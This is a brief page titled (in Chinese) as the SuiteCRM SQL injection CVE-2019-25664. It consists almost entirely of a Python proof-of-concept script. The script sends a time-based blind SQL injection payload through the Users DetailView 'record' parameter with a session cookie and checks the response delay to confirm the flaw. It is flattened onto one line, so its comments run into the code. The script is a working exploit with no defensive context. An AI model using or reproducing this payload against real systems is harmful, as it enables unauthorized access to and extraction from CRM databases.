CVE-2019-25664 SuiteCRM SQL注入漏洞

import requests # Target URL configuration target_url = "http://target-site/index.php" # Time-based blind SQL injection payload # This payload checks if the response is delayed, confirming injection payload = "?module=Users&action=DetailView&record=1' AND IF(SUBSTRING(VERSION(),1,1)='5',SLEEP(5),0)-- -" # Valid session cookie is required as per PR:L cookies = { "PHPSESSID": "valid_session_id_here" } try: print("Sending payload...") response = requests.get(target_url + payload, cookies=cookies, timeout=10) # Analyze response time to determine if the conditional sleep occurred if response.elapsed.total_seconds() > 5: print("Vulnerability confirmed: Response time delayed.") else: print("Vulnerability not confirmed or patch applied.") except requests.exceptions.RequestException as e: print(f"Request failed: {e}")